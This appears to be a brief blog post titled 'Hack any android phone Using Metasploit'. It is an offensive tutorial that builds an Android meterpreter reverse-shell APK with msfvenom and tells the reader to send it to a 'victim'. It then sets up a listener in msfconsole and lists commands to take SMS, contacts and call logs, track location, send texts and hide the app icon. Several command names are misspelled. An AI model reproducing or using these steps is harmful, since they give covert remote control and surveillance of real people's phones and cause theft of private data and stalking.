Hack any android phone Using Metasploit
METASPLOIT CREATE A PAYLOAD 1. Open a terminal 2. Type the following: msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port no R>apk_name.apk 3. Run this command and wait few seconds 4. Payload created successfully 5. Send the apk file to victim 5. Now, open an another terminal 6. Then type the following: msfconsole (metasploit framework is opened) use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST your ip set LPORT your port np exploit 7. Started reverse tcp handler... Now use the following commands dumb_sms dumb_contacts dumb_calllog geolocate send_sms send_audio_mode hide_app_icon ...etc
Comments
Post a Comment